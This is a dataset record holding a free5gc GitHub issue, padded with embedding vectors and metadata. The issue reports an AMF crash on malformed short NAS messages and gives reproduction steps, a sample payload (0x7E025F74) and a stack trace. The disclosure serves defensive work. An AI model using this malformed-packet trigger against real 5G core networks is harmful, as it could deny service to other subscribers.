-0.0003434737154748291, 0.011038945987820625, 0.031523916870355606, 0.006108853965997696, 0.0012454655952751637, -0.008163723163306713, -0.0004806143115274608, 0.008952219039201736, -0.009382307529449463, -0.008044254034757614, 0.012345141731202602, -0.0055234553292393684, 0.014073462225496769, -0.0005485623842105269, 0.013324788771569729, 0.014073462225496769, -0.022603556513786316, 0.032559316605329514, -0.0036139406729489565, -0.015156649053096771, -0.0013888285029679537, -0.019943377003073692, -0.007247793022543192, -0.005292481742799282, 0.0002922015555668622, -0.009438060224056244, -0.010608857497572899, 0.01395399309694767, 0.021217714995145798, 0.0004154040652792901, 0.013181425631046295, 0.003596020396798849, -0.0035840733908116817, 0.011038945987820625, -0.01024248544126749, -0.003478542435914278, 0.0018418155377730727, -0.03055223450064659, 0.0040818615816533566, -0.012528328225016594, -0.008370802737772465, -0.0054915971122682095, -0.007908855564892292, -0.011819478124380112, 0.0074429260566830635, -0.00879292655736208, -0.008370802737772465, 0.003044471377506852, -0.014702665619552135, 0.01432832982391119, 0.008466377854347229, 0.02102656476199627, 0.010967264883220196, 0.001837833202444017, -0.010545141063630581, -0.006670359056442976, 0.024738071486353874, -0.02043718285858631, 0.0063238986767828465, 0.00290907290764153, 0.01011505164206028, -0.00009669531573308632, 0.0036159318406134844, -0.006961067207157612, -0.019863732159137726, -0.0008586843032389879, 0.00018007479957304895, 0.01828673854470253, 0.014686736278235912, -0.008171687833964825, 0.010911512188613415, 0.021695591509342194, -0.011166379787027836, 0.01041770726442337, -0.011891159228980541, -0.0009233967284671962, -0.0021942495368421078, 0.00782124511897564, -0.011405318044126034, -0.008139829151332378, -0.012655762024223804, 0.010306202806532383, -0.03275046870112419, 0.01590532250702381, 0.020946918055415154, -0.014033638872206211, 0.005467703100293875, -0.014272577129304409, -0.001644691452383995, 0.005137172061949968, 0.021392935886979103, 0.008912395685911179, 0.01435222290456295, -0.011293813586235046, 0.013444257900118828, 0.002405311446636915, 0.025900904089212418, 0.0064234561286866665, 0.00157002336345613, 0.022157538682222366, 0.023495592176914215, 0.010959300212562084, 0.00026108979363925755, 0.037146929651498795, 0.0041336314752697945, -0.013061956502497196, -0.018079658970236778, 0.02765311859548092, 0.00946991890668869, -0.009573458693921566, -0.002883187960833311, -0.018095588311553, 0.02844957821071148, 0.01844603195786476, 0.02023010328412056, 0.025184089317917824, -0.004022127017378807, 0.020150458440184593, 0.02720710076391697, 0.013388505205512047, 0.041989412158727646, 0.004679207224398851, 0.01584160514175892, -0.0018736739875748754, -0.010393813252449036, 0.013492045924067497, -0.0038070825394243, -0.021058423444628716, 0.0027796481736004353, 0.00013241160195320845, 0.010784079320728779, 0.0048464639112353325, 0.002279869047924876, -0.0306955985724926, -0.0021165944635868073, -0.014989391900599003, 0.006893367972224951, 0.008633635006844997, 0.010346025228500366, -0.00892036035656929, 0.0022977893240749836, -0.003122126217931509, -0.011046910658478737, 0.005447791889309883, -0.0280513484030962, -0.008354873396456242, -0.0019911518320441246, -0.006057084072381258, -0.0025845151394605637, -0.008235404267907143, 0.010298238135874271, -0.024499133229255676, 0.008800891228020191, -0.013930099084973335, 0.02860887162387371, -0.0031798696145415306, -0.014439834281802177, 0.0038488965947180986, -0.015196471475064754, -0.0010304211173206568, 0.028624800965189934, -0.012146026827394962, 0.0033809759188443422, -0.026283206418156624, -0.008784962818026543, 0.0432637482881546 ]
null
null
null
null
null
null
null
null
null
[ "free5gc", "free5gc" ]
## Describe the bug The AMF crashed when receiving a short plaintext initial NAS message with a security header type greater than 0 from UE. This bug is caused by a missing length check of the payload. ## To Reproduce Steps to reproduce the behavior: 1. Run free5gc with default config. 2. Connect UERANSIM gNB (or any other compatible gNB implementations) with free5GC 3. Use UERANSIM UE (or any other compatible UE implementations) to send an initial NAS message with a payload length less than 6 (without header), and a security header type greater than 0. (e.g., 0x7E025F74) The malformed packet can be sent by modifying sendNasMessage() function in src/ue/nas/mm/messaging.cpp of UERANSIM. ## Expected behavior The program should discard the malformed packet instead of a crash. ## Environment (please complete the following information): - free5GC Version: v3.3.0 - OS: Ubuntu 22.04 LTS - Kernel version: 6.2.0-39-generic - go version: 1.21.5 linux/amd64 ## Trace File ### Configuration File Use the default configuration file ### PCAP File [free5gc_crash_ngap.zip](https://github.com/free5gc/free5gc/files/13814407/free5gc_crash_ngap.zip) ### Log File [FATA][AMF][Ngap] panic: runtime error: slice bounds out of range [7:4] goroutine 44 [running]: runtime/debug.Stack() /snap/go/10426/src/runtime/debug/stack.go:24 +0x5e [github.com/free5gc/amf/internal/ngap/service.handleConnection.func1()](http://github.com/free5gc/amf/internal/ngap/service.handleConnection.func1()) /free5gc/NFs/amf/internal/ngap/service/service.go:184 +0x45 panic({0xc64940?, 0xc0005281b0?}) /snap/go/10426/src/runtime/panic.go:914 +0x21f [github.com/free5gc/amf/internal/nas/nas_security.DecodePlainNasNoIntegrityCheck](http://github.com/free5gc/amf/internal/nas/nas_security.DecodePlainNasNoIntegrityCheck)({0xc000433760, 0x6, 0x8}) /free5gc/NFs/amf/internal/nas/nas_security/security.go:362 +0x11d [github.com/free5gc/amf/internal/ngap.handleInitialUEMessageMain](http://github.com/free5gc/amf/internal/ngap.handleInitialUEMessageMain)(0xc0004da000, 0xc0002f2040, 0xc0004333e8, 0xc000246030, 0xc00078c600, 0xc00047a1e8, 0x0, 0xc00047a4e8, 0xc000128c68?) /free5gc/NFs/amf/internal/ngap/handler.go:451 +0x2e5 [github.com/free5gc/amf/internal/ngap.handlerInitialUEMessage](http://github.com/free5gc/amf/internal/ngap.handlerInitialUEMessage)(0xc0004da000, 0xc53da0?, 0xc0007b41c0) /free5gc/NFs/amf/internal/ngap/handler_generated.go:3503 +0x14cf [github.com/free5gc/amf/internal/ngap.dispatchMain](http://github.com/free5gc/amf/internal/ngap.dispatchMain)(0xc0004da000, 0x3a?) /free5gc/NFs/amf/internal/ngap/dispatcher_generated.go:49 +0x12f [github.com/free5gc/amf/internal/ngap.Dispatch](http://github.com/free5gc/amf/internal/ngap.Dispatch)({0xe1a3f8?, 0xc0003fa070}, {0xc00058c000, 0x3a, 0x40000}) /free5gc/NFs/amf/internal/ngap/dispatcher.go:45 +0x1f5 [github.com/free5gc/amf/internal/ngap/service.handleConnection](http://github.com/free5gc/amf/internal/ngap/service.handleConnection)(0xc0003fa070, 0x40000, {0xd339f0?, 0xd33a00?, 0xd339f8?}) /free5gc/NFs/amf/internal/ngap/service/service.go:237 +0x3e4 created by [github.com/free5gc/amf/internal/ngap/service.listenAndServe](http://github.com/free5gc/amf/internal/ngap/service.listenAndServe) in goroutine 22 /free5gc/NFs/amf/internal/ngap/service/service.go:158 +0x9a5 ## Additional context This security issue could allow a denial of service attack launched from a malicious UE to crash the AMF and affect other users. I'll create a pull request regarding this issue shortly.
[Bugs] AMF crashed with malformed NAS packets from UE
https://api.github.com/repos/free5gc/free5gc/issues/523/comments
2
2024-01-02T22:57:28
2024-01-09T14:04:32Z
https://github.com/free5gc/free5gc/issues/523
2,063,046,665
523
false
This is a GitHub Issue repo:free5gc owner:free5gc Title : [Bugs] AMF crashed with malformed NAS packets from UE Issue date: --- start body --- ## Describe the bug The AMF crashed when receiving a short plaintext initial NAS message with a security header type greater than 0 from UE. This bug is caused by a missing length check of the payload. ## To Reproduce Steps to reproduce the behavior: 1. Run free5gc with default config. 2. Connect UERANSIM gNB (or any other compatible gNB implementations) with free5GC 3. Use UERANSIM UE (or any other compatible UE implementations) to send an initial NAS message with a payload length less than 6 (without header), and a security header type greater than 0. (e.g., 0x7E025F74) The malformed packet can be sent by modifying sendNasMessage() function in src/ue/nas/mm/messaging.cpp of UERANSIM. ## Expected behavior The program should discard the malformed packet instead of a crash. ## Environment (please complete the following information): - free5GC Version: v3.3.0 - OS: Ubuntu 22.04 LTS - Kernel version: 6.2.0-39-generic - go version: 1.21.5 linux/amd64 ## Trace File ### Configuration File Use the default configuration file ### PCAP File [free5gc_crash_ngap.zip](https://github.com/free5gc/free5gc/files/13814407/free5gc_crash_ngap.zip) ### Log File [FATA][AMF][Ngap] panic: runtime error: slice bounds out of range [7:4] goroutine 44 [running]: runtime/debug.Stack() /snap/go/10426/src/runtime/debug/stack.go:24 +0x5e [github.com/free5gc/amf/internal/ngap/service.handleConnection.func1()](http://github.com/free5gc/amf/internal/ngap/service.handleConnection.func1()) /free5gc/NFs/amf/internal/ngap/service/service.go:184 +0x45 panic({0xc64940?, 0xc0005281b0?}) /snap/go/10426/src/runtime/panic.go:914 +0x21f [github.com/free5gc/amf/internal/nas/nas_security.DecodePlainNasNoIntegrityCheck](http://github.com/free5gc/amf/internal/nas/nas_security.DecodePlainNasNoIntegrityCheck)({0xc000433760, 0x6, 0x8}) /free5gc/NFs/amf/internal/nas/nas_security/security.go:362 +0x11d [github.com/free5gc/amf/internal/ngap.handleInitialUEMessageMain](http://github.com/free5gc/amf/internal/ngap.handleInitialUEMessageMain)(0xc0004da000, 0xc0002f2040, 0xc0004333e8, 0xc000246030, 0xc00078c600, 0xc00047a1e8, 0x0, 0xc00047a4e8, 0xc000128c68?) /free5gc/NFs/amf/internal/ngap/handler.go:451 +0x2e5 [github.com/free5gc/amf/internal/ngap.handlerInitialUEMessage](http://github.com/free5gc/amf/internal/ngap.handlerInitialUEMessage)(0xc0004da000, 0xc53da0?, 0xc0007b41c0) /free5gc/NFs/amf/internal/ngap/handler_generated.go:3503 +0x14cf [github.com/free5gc/amf/internal/ngap.dispatchMain](http://github.com/free5gc/amf/internal/ngap.dispatchMain)(0xc0004da000, 0x3a?) /free5gc/NFs/amf/internal/ngap/dispatcher_generated.go:49 +0x12f [github.com/free5gc/amf/internal/ngap.Dispatch](http://github.com/free5gc/amf/internal/ngap.Dispatch)({0xe1a3f8?, 0xc0003fa070}, {0xc00058c000, 0x3a, 0x40000}) /free5gc/NFs/amf/internal/ngap/dispatcher.go:45 +0x1f5 [github.com/free5gc/amf/internal/ngap/service.handleConnection](http://github.com/free5gc/amf/internal/ngap/service.handleConnection)(0xc0003fa070, 0x40000, {0xd339f0?, 0xd33a00?, 0xd339f8?}) /free5gc/NFs/amf/internal/ngap/service/service.go:237 +0x3e4 created by [github.com/free5gc/amf/internal/ngap/service.listenAndServe](http://github.com/free5gc/amf/internal/ngap/service.listenAndServe) in goroutine 22 /free5gc/NFs/amf/internal/ngap/service/service.go:158 +0x9a5 ## Additional context This security issue could allow a denial of service attack launched from a malicious UE to crash the AMF and affect other users. I'll create a pull request regarding this issue shortly. --- end body ---
3,755
[ -0.04701658710837364, 0.013116946443915367, -0.00879005715250969, -0.004367772955447435, 0.028128184378147125, 0.034369807690382004, -0.02979080006480217, 0.04303721338510513, -0.029518239200115204, 0.016421735286712646, -0.04325525835156441, 0.013123759999871254, 0.009519155137240887, 0.0061189704574644566, -0.012299266643822193, -0.005369430407881737, -0.028755072504281998, -0.015794847160577774, -0.010568510740995407, 0.0038771647959947586, 0.011297608725726604, 0.009464642964303493, 0.010977351106703281, 0.05691051110625267, 0.008476614020764828, 0.03336133435368538, -0.015672195702791214, 0.015849359333515167, 0.0003083334013354033, 0.011904054321348667, -0.020809950307011604, 0.013334994204342365, 0.01216298621147871, 0.01027550920844078, 0.06127147004008293, 0.009123943746089935, 0.030172383412718773, 0.047152865678071976, -0.050968706607818604, 0.00026212597731500864, 0.0027443377766758204, -0.046989329159259796, -0.026152124628424644, 0.00133554358035326, -0.01614917628467083, 0.0007857391610741615, -0.01146114431321621, 0.0026063541881740093, -0.03911234810948372, 0.010289137251675129, 0.026888037100434303, -0.024993745610117912, -0.03273444622755051, -0.05344900116324425, 0.001106422976590693, -0.027910135686397552, 0.05453924089670181, 0.020360225811600685, -0.019542546942830086, -0.012340150773525238, -0.002144705969840288, -0.002371271373704076, 0.02801916003227234, 0.02789650857448578, 0.007440885994583368, 0.04685305058956146, -0.04001179710030556, -0.0045381225645542145, -0.03982100635766983, 0.0022639508824795485, -0.03297974914312363, -0.010629837401211262, 0.008960407227277756, 0.005188859533518553, 0.024094296619296074, -0.011086374521255493, 0.04429098591208458, 0.08062322437763214, 0.001229926710948348, -0.0005204190965741873, -0.04017533361911774, 0.03101731836795807, -0.007652119733393192, 0.003870351007208228, 0.049742184579372406, 0.02801916003227234, -0.023739969357848167, -0.07048399746417999, -0.030390432104468346, -0.008435729891061783, -0.0054648262448608875, 0.03472413495182991, -0.005999725311994553, 0.0023440152872353792, -0.0016489875270053744, 0.03158969432115555, -0.05413040146231651, -0.004480203613638878, -0.05538417771458626, 0.030008846893906593, -0.015127075836062431, 0.01378471776843071, 0.026928920298814774, -0.006865103263407946, 0.005590885411947966, 0.008701475337147713, -0.011985822580754757, 0.015208844095468521, 0.010050646960735321, 0.13617093861103058, 0.024789325892925262, 0.01959705911576748, -0.02683352492749691, -0.023658201098442078, 0.013130574487149715, -0.033388592302799225, -0.0012622931972146034, 0.013246412388980389, -0.05284936726093292, 0.02206372655928135, -0.003955525811761618, -0.03919411823153496, -0.01783904619514942, -0.009137571789324284, -0.045953601598739624, 0.03134439140558243, -0.00318895117379725, 0.008149541914463043, -0.02292228862643242, -0.0347786471247673, 0.0027630762197077274, -0.03892155736684799, 0.011209026910364628, -0.002889135153964162, 0.0036795588675886393, -0.0016668742755427957, -0.041020266711711884, 0.00887863989919424, 0.0020884904079139233, 0.004715286660939455, -0.019692454487085342, -0.01047992892563343, 0.03284347057342529, -0.02071455493569374, -0.0011157921981066465, 0.00846298597753048, 0.02769208885729313, -0.03693186864256859, -0.024721184745430946, 0.016040151938796043, -0.024557648226618767, -0.022159121930599213, 0.004824310541152954, -0.012858014553785324, 0.03382468596100807, -0.022486193105578423, 0.007972377352416515, -0.0013551338342949748, -0.0034257376100867987, -0.026247519999742508, 0.016626155003905296, 0.002311648800969124, 0.009512341581285, -0.05001474544405937, 0.0034206269774585962, 0.03232560679316521, 0.027106083929538727, 0.004667588509619236, -0.008394845761358738, 0.04096575826406479, -0.004265562631189823, 0.0015995861031115055, 0.03417901322245598, 0.042055997997522354, -0.01614917628467083, 0.010732047259807587, 0.0118359150364995, 0.037367966026067734, 0.012074404396116734, 0.00977808702737093, -0.006991161964833736, 0.030662991106510162, -0.0010553179308772087, 0.008912709541618824, 0.024230577051639557, -0.014800003729760647, -0.007495397701859474, -0.016081035137176514, 0.029981590807437897, -0.04461805894970894, -0.01680331863462925, -0.004449540749192238, -0.002739227144047618, -0.015467775985598564, 0.002258840249851346, 0.004125875886529684, 0.007624863646924496, -0.03131713345646858, -0.016735179349780083, -0.019869618117809296, 0.03521474078297615, -0.014759119600057602, -0.01549503207206726, -0.02897311933338642, -0.03393371030688286, 0.025320816785097122, -0.035896141082048416, 0.017103135585784912, -0.012639966793358326, -0.026193007826805115, -0.017062250524759293, -0.02359006181359291, 0.016748806461691856, 0.008333520032465458, 0.018356909975409508, -0.00198798393830657, -0.029082143679261208, 0.018765751272439957, -0.035241998732089996, 0.005751014221459627, 0.05712855979800224, -0.011631494387984276, 0.01218342874199152, -0.0005417128559201956, -0.03423352539539337, -0.023808108642697334, -0.019828734919428825, -0.02301768586039543, -0.06121695786714554, 0.0013568373396992683, 0.024271460250020027, 0.0037647339049726725, 0.008769615553319454, 0.024216949939727783, 0.03109908662736416, -0.0035875700414180756, -0.0057339794002473354, -0.02053738944232464, -0.010582138784229755, 0.021191533654928207, -0.02383536472916603, 0.015276983380317688, 0.011638308875262737, -0.03843094781041145, -0.02465304546058178, 0.04584457725286484, -0.004371179733425379, 0.011174957267940044, -0.04224678874015808, 0.0038396879099309444, -0.03532376512885094, -0.020769065245985985, 0.00965543556958437, 0.026942549273371696, -0.013914183713495731, 0.007815656252205372, -0.03464236482977867, -0.0043575516901910305, 0.009232967160642147, -0.002580801723524928, 0.02856427989900112, -0.01167237851768732, -0.012783060781657696, 0.012476430274546146, 0.009171641431748867, -0.00965543556958437, -0.03660479933023453, 0.007863353937864304, 0.010370905511081219, -0.033143285661935806, -0.006309762131422758, -0.029899824410676956, -0.036713819950819016, -0.005267220549285412, -0.003064595628529787, 0.026779012754559517, 0.011617866344749928, 0.013627995736896992, 0.01349852979183197, -0.009171641431748867, -0.018111607059836388, -0.012455988675355911, -0.006619798950850964, -0.00809502974152565, -0.012346964329481125, -0.010077903047204018, -0.00885819736868143, -0.04088398814201355, -0.03982100635766983, 0.018343282863497734, -0.02473481371998787, -0.013178272172808647, -0.06530535966157913, 0.007693003863096237, 0.01261271070688963, 0.03900332376360893, 0.025402585044503212, 0.05069614574313164, -0.002873803721740842, 0.01197900902479887, 0.00018408441974315792, 0.004153131972998381, 0.002405341248959303, 0.017852675169706345, -0.035896141082048416, 0.00374429184012115, -0.01041860319674015, -0.007086557801812887, -0.019160961732268333, 0.02300405688583851, 0.0481613390147686, -0.037122663110494614, -0.037040892988443375, -0.03028140775859356, -0.02905488759279251, -0.008844569325447083, 0.020809950307011604, -0.013839229941368103, -0.03317054361104965, -0.0202512014657259, -0.007958749309182167, -0.00872873142361641, -0.0019249544711783528, 0.04137459769845009, 0.02675175666809082, -0.009818971157073975, -0.011358934454619884, 0.02654733695089817, -0.04317349195480347, 0.0038328738883137703, 0.010248253121972084, -0.005475047510117292, 0.0058907014317810535, -0.04769798740744591, -0.01133849285542965, -0.025048257783055305, -0.0041292826645076275, 0.03180774301290512, 0.016585271805524826, -0.0099211810156703, -0.02008766680955887, 0.011638308875262737, -0.008762801997363567, 0.004684623796492815, -0.007434071972966194, 0.02596133202314377, -0.027187852188944817, -0.00467440253123641, 0.024639416486024857, 0.002240101806819439, 0.0009232967277057469, 0.008660591207444668, 0.025988588109612465, 0.0020305714569985867, 0.021682141348719597, -0.019787849858403206, 0.025048257783055305, -0.023249361664056778, 0.020973486825823784, 0.016339967027306557, 0.005004881415516138, 0.015481404028832912, 0.021259674802422523, 0.02008766680955887, 0.004367772955447435, -0.0005706723313778639, 0.004820903763175011, -0.03069024719297886, -0.008871825411915779, -0.035814374685287476, -0.016735179349780083, 0.03554181382060051, -0.009553225710988045, -0.03603242337703705, -0.020196691155433655, -0.011140886694192886, 0.02087808959186077, -0.0000767639503465034, -0.049905721098184586, 0.028209952637553215, -0.021545862779021263, -0.0005693947314284742, 0.01119539886713028, -0.03131713345646858, 0.05685599893331528, 0.02864604815840721, 0.008353961631655693, 0.04827036336064339, -0.01786630228161812, 0.007004790008068085, -0.011576983146369457, 0.042628370225429535, -0.010309578850865364, -0.032652679830789566, -0.008871825411915779, 0.006701567210257053, -0.0004995512426830828, -0.009818971157073975, 0.024312345311045647, -0.03158969432115555, 0.018438678234815598, 0.017648255452513695, 0.0029095772188156843, 0.03766778111457825, -0.008163169957697392, -0.01747109182178974, -0.019120078533887863, -0.03213481605052948, 0.04663500189781189, -0.032816216349601746, 0.016776062548160553, -0.006674311123788357, 0.0030356361530721188, -0.01436390820890665, 0.016939599066972733, 0.028155440464615822, -0.0351874865591526, -0.0035909770522266626, -0.021218789741396904, 0.017811790108680725, 0.01522247213870287, 0.03562358021736145, 0.04647146537899971, 0.005263813305646181, 0.00817679800093174, 0.028673304244875908, -0.043364282697439194, 0.007304606027901173, 0.02634291723370552, 0.015644939616322517, -0.0019675418734550476, -0.006381309125572443, 0.009376061148941517, -0.01738932356238365, -0.01820700243115425, -0.05077791213989258, -0.0039793746545910835, -0.005458012688905001, -0.0420832522213459, -0.022118236869573593, -0.03562358021736145, 0.03142615780234337, -0.034369807690382004, -0.015413263812661171, -0.02251344919204712, -0.022172749042510986, -0.010820629075169563, -0.022458937019109726, 0.009764458984136581, -0.02251344919204712, -0.048461154103279114, 0.020728182047605515, -0.04889725148677826, -0.0013789829099550843, 0.016367223113775253, -0.029654519632458687, -0.005430756602436304, -0.0020424958784133196, 0.037994854152202606, 0.03755875676870346, 0.0007499656639993191, 0.031862255185842514, 0.007032046094536781, 0.018588587641716003, 0.034996695816516876, 0.022499822080135345, 0.007079743780195713, -0.024707557633519173, 0.02169577032327652, -0.013716578483581543, -0.005604513455182314, 0.008020075969398022, 0.02962726354598999, -0.0063302041962742805, 0.007904238067567348, -0.0006579766632057726, -0.019937759265303612, 0.014731863513588905, -0.018179746344685555, 0.013041992671787739, 0.007161512039601803, 0.03325231000781059, 0.024871092289686203, 0.029000375419855118, 0.005556815303862095, -0.03949393332004547, -0.010084717534482479, 0.02938196063041687, -0.022540705278515816, -0.014718235470354557, 0.024802953004837036, -0.008715103380382061, -0.03077201545238495, -0.03753150254487991, -0.0037579198833554983, -0.0118359150364995, 0.016408108174800873, 0.04276465252041817, 0.029490983113646507, -0.006258657202124596, 0.006493740249425173, -0.03069024719297886, 0.05181363970041275, 0.019011054188013077, -0.017321182414889336, -0.017893558368086815, 0.004248527809977531, 0.025402585044503212, -0.012544570490717888, -0.009008105844259262, 0.001034875982441008, -0.022281773388385773, -0.015644939616322517, -0.0429009310901165, -0.025661516934633255, -0.02259521745145321, 0.019133707508444786, -0.011985822580754757, 0.05843684822320938, 0.01786630228161812, -0.0007716852705925703, -0.022131865844130516, -0.009723574854433537, 0.026901664212346077, 0.017702767625451088, -0.021504977717995644, 0.025457097217440605, 0.017552858218550682, -0.003361004637554288, -0.011590611189603806, -0.01708950661122799, 0.0034495864529162645, -0.006064458284527063, 0.019447149708867073, -0.0323801189661026, 0.001819337485358119, -0.015604055486619473, 0.042301300913095474, -0.0007844615029171109, -0.02140958234667778, -0.006916208192706108, 0.03791308403015137, -0.052740346640348434, 0.009314735420048237, -0.04085673391819, 0.02962726354598999, -0.020237574353814125, 0.01076611690223217, 0.0008858197252266109, -0.007154698017984629, 0.0065278103575110435, -0.005594292655587196, 0.023167593404650688, -0.0018823669524863362, -0.0013142499374225736, -0.009069431573152542, 0.04042063653469086, 0.04592634737491608, 0.025157280266284943, 0.00893315114080906, -0.0013457646127790213, -0.007502211723476648, -0.0014564921148121357, 0.0048856367357075214, -0.03175323083996773, 0.0009692911989986897, 0.004998067393898964, -0.007256907876580954, -0.0022111423313617706, 0.015127075836062431, 0.005509117618203163, -0.00467440253123641, -0.025130024179816246, 0.008169983513653278, -0.021477721631526947, 0.01688508689403534, -0.00580552639439702, -0.001699240761809051, -0.0037238500081002712, -0.014622840099036694, 0.02577054128050804, -0.014663724228739738, -0.0027545588091015816, 0.009042175486683846, -0.010009762831032276, -0.003819245845079422, 0.021927446126937866, -0.009914367459714413, 0.005952027160674334, -0.012483244761824608, 0.03270719200372696, -0.0035092090256512165, -0.0017750464612618089, 0.007890610024333, 0.028046416118741035, 0.002752855187281966, -0.013682507909834385, 0.0027017502579838037, 0.017062250524759293, -0.017620999366044998, -0.02198195829987526, 0.024012528359889984, 0.025034628808498383, -0.0248983483761549, -0.0029368330724537373, 0.03158969432115555, 0.003928269725292921, 0.03551455959677696, -0.04360958933830261, 0.011808658950030804, 0.019624315202236176, 0.011617866344749928, 0.04952413961291313, -0.050069257616996765, -0.01672155037522316, 0.013321366161108017, 0.03657754138112068, -0.008708289824426174, -0.005308104678988457, 0.015753963962197304, 0.031289879232645035, -0.006715195253491402, 0.02420332096517086, -0.001042541698552668, 0.014554699882864952, 0.02275875397026539, -0.0008257713634520769, 0.018302399665117264, -0.013532600365579128, -0.022867778316140175, -0.038158390671014786, 0.007502211723476648, -0.005716944579035044, -0.0392758846282959, -0.03690461441874504, 0.023562805727124214, 0.03297974914312363, -0.03172597661614418, 0.0033184171188622713, -0.023821737617254257, -0.012285638600587845, -0.0043575516901910305, -0.016653411090373993, 0.013920998200774193, -0.026765383780002594, 0.004981032572686672, 0.0025756913237273693, 0.010861513204872608, 0.01861584186553955, 0.021109765395522118, -0.018343282863497734, -0.0056624324060976505, 0.0027596692088991404, 0.020782694220542908, 0.0025194757618010044, -0.002160037402063608, 0.05181363970041275, 0.03916686028242111, 0.01569945178925991, -0.03521474078297615, -0.027351388707756996, -0.03998453915119171, -0.010261881165206432, -0.05156833678483963, 0.03916686028242111, -0.039793748408555984, -0.033715661615133286, -0.01996501348912716, 0.007338676135987043, 0.03142615780234337, 0.002599540166556835, -0.03060847893357277, -0.018179746344685555, 0.020292086526751518, -0.02856427989900112, -0.01704862341284752, 0.009546411223709583, 0.019365383312106133, 0.01358029805123806, -0.027746601030230522, -0.004425691906362772, 0.01033683493733406, -0.025075513869524002, 0.019746966660022736, -0.021314185112714767, 0.003144660033285618, -0.0007478363113477826, -0.00036369715235196054, 0.007420443929731846, -0.04709835350513458, 0.013369063846766949, -0.015972010791301727, 0.02699705958366394, 0.0001408581156283617, 0.030254151672124863, 0.003931676968932152, 0.03229835256934166, 0.013914183713495731, -0.031535182148218155, 0.02728324756026268, -0.013130574487149715, 0.008265379816293716, 0.011938124895095825, 0.0013219156535342336, 0.013846044428646564, 0.035269252955913544, 0.0011362341465428472, 0.0008376959012821317, 0.03148066997528076, 0.017280299216508865, -0.007400001864880323, -0.031698718667030334, -0.02650645188987255, 0.02222726121544838, -0.019528917968273163, -0.007379559800028801, 0.012932968325912952, 0.01696685515344143, -0.005723758600652218, 0.029082143679261208, 0.002240101806819439, -0.007311420049518347, -0.011965380981564522, -0.042710140347480774, -0.011386190541088581, -0.0026881222147494555, 0.00728416396304965, 0.01853407546877861, -0.006725416053086519, 0.008626521565020084, -0.028673304244875908, -0.03357938304543495, 0.028209952637553215, 0.008892267942428589, -0.018438678234815598, 0.02021031826734543, 0.01522247213870287, 0.0027017502579838037, 0.014813631772994995, 0.020114922896027565, -0.015181588008999825, -0.0023389048874378204, 0.0007295236573554575, -0.007543095853179693, -0.0172121599316597, 0.004882229492068291, 0.000184723234269768, -0.0033933711238205433, -0.032271094620227814, 0.002550138859078288, 0.008292635902762413, 0.016258198767900467, 0.0360051654279232, -0.03235286474227905, -0.023658201098442078, 0.006078086327761412, 0.020700925961136818, 0.005120719783008099, -0.0230858251452446, -0.003161695087328553, -0.008449357934296131, 0.02736501581966877, -0.0040372940711677074, 0.026601849123835564, 0.03028140775859356, -0.01745746284723282, -0.018833890557289124, -0.0036829658783972263, -0.0133554358035326, 0.00920571107417345, 0.03208030387759209, 0.01465009618550539, -0.031562440097332, -0.01366206631064415, 0.0115429125726223, -0.009151199832558632, 0.004156538750976324, -0.008108657784759998, 0.026356544345617294, 0.004251934587955475, -0.01861584186553955, 0.026315661147236824, -0.024748440831899643, 0.030308663845062256, -0.013907370157539845, -0.029027631506323814, -0.0175937432795763, -0.02473481371998787, 0.007352303713560104, 0.028918607160449028, -0.014459303580224514, -0.028836840763688087, 0.017852675169706345, -0.012462802231311798, 0.0027562621980905533, -0.01824788749217987, 0.019733337685465813, 0.04072045162320137, -0.02761032059788704, -0.007032046094536781, 0.00018323266704101115, -0.004251934587955475, -0.030254151672124863, 0.00013904814841225743, -0.019692454487085342, -0.012517314404249191, -0.014268511906266212, -0.0029436470940709114, -0.04341879487037659, -0.003301382064819336, 0.0016532462323084474, 0.011767774820327759, 0.0062995413318276405, 0.009403317235410213, 0.03246188536286354, -0.017062250524759293, 0.01963794231414795, -0.01366206631064415, -0.013607554137706757, -0.0074068158864974976, -0.006081493105739355, 0.018970170989632607, -0.0074477000162005424, -0.004337109625339508, 0.010745675303041935, -0.011631494387984276, 0.01056169718503952, -0.0007065264508128166, 0.021027998998761177, -0.020278457552194595, -0.009818971157073975, -0.040584173053503036, 0.003866943996399641, -0.021341441199183464, -0.03466962277889252, 0.0055534085258841515, -0.012496872805058956, 0.024230577051639557, -0.03919411823153496, 0.012142544612288475, -0.0198423620313406, 0.0041292826645076275, 0.011086374521255493, -0.015304239466786385, -0.0029436470940709114, -0.013716578483581543, -0.036386750638484955, -0.006112156435847282, 0.01428213994950056, -0.021150650456547737, 0.004981032572686672, 0.025511609390378, 0.004234899766743183, 0.03295249491930008, 0.011283980682492256, 0.0021787758450955153, -0.010220997035503387, 0.008388031274080276, 0.016448991373181343, -0.011243096552789211, 0.011474772356450558, 0.014663724228739738, -0.006388123147189617, -0.012714920565485954, 0.021218789741396904, 0.011154514737427235, -0.023399269208312035, -0.08073224872350693, -0.024503137916326523, 0.00606105150654912, 0.003042450174689293, -0.022826893255114555, 0.008483427576720715, 0.0024223763030022383, -0.016735179349780083, -0.02889135107398033, 0.0076044220477342606, -0.001012730412185192, -0.0030339325312525034, 0.017770906910300255, -0.01857495866715908, -0.0011745629599317908, -0.023399269208312035, 0.019624315202236176, 0.049578651785850525, -0.01963794231414795, 0.02485746517777443, -0.02842799946665764, -0.040039051324129105, -0.02823720872402191, 0.00458241393789649, -0.010752488858997822, -0.024503137916326523, -0.0018295585177838802, 0.03003610298037529, 0.015604055486619473, -0.008558381348848343, -0.011965380981564522, -0.048433899879455566, 0.029409214854240417, -0.014827259816229343, -0.01713039167225361, -0.01244917418807745, -0.01189724076539278, -0.028673304244875908, -0.0025825053453445435, 0.037586014717817307, 0.01631271094083786, -0.011665564961731434, -0.000008111585884762462, -0.0018585179932415485, -0.008258565329015255, -0.013273668475449085, -0.024843836203217506, -0.03377017378807068, 0.02161400206387043, -0.04369135573506355, 0.01828877069056034, -0.00371362897567451, 0.0582733117043972, 0.00963499303907156, 0.01317145861685276, -0.0057816775515675545, 0.001148158684372902, 0.02136869728565216, -0.009028547443449497, -0.003326934529468417, -0.009253409691154957, -0.01253094244748354, 0.02153223380446434, -0.01963794231414795, -0.017811790108680725, -0.026819895952939987, -0.007693003863096237, -0.0013278778642416, -0.014813631772994995, -0.020169435068964958, 0.013968695886433125, -0.03466962277889252, -0.026029473170638084, -0.024230577051639557, -0.014118604362010956, 0.006868510041385889, 0.009437386877834797, 0.003120811190456152, 0.002907873596996069, 0.026165751740336418, -0.028537023812532425, -0.023153966292738914, 0.0032656085677444935, -0.0566924624145031, -0.027964647859334946, 0.0216548852622509, -0.034615110605955124, -0.011454330757260323, 0.016258198767900467, -0.015154331922531128, -0.023440154269337654, -0.019774222746491432, 0.029736287891864777, 